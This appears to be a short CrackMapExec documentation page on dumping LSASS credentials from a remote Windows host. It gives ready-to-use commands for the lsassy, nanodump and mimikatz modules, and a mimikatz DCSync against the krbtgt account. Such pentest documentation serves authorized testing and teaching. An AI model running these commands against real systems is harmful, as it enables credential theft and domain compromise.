Comment on page
Dump LSASS
You need at least local admin privilege on the remote target, use option --local-auth if your user is a local account
#~ cme smb 192.168.255.131 -u administrator -p pass -M lsassy

Using the module nanodump you can dump remotely the credentials
#~ cme smb 192.168.255.131 -u administrator -p pass -M nanodump
You need at least local admin privilege on the remote target, use option --local-auth if your user is a local account
Using the module Mimikatz, the powershell script Invoke-mimikatz.ps1 will be executed on the remote target
#~ cme smb 192.168.255.131 -u administrator -p pass -M mimikatz
#~ cme smb 192.168.255.131 -u Administrator -p pass -M mimikatz -o COMMAND='"lsadump::dcsync /domain:domain.local /user:krbtgt"
Last modified 1yr ago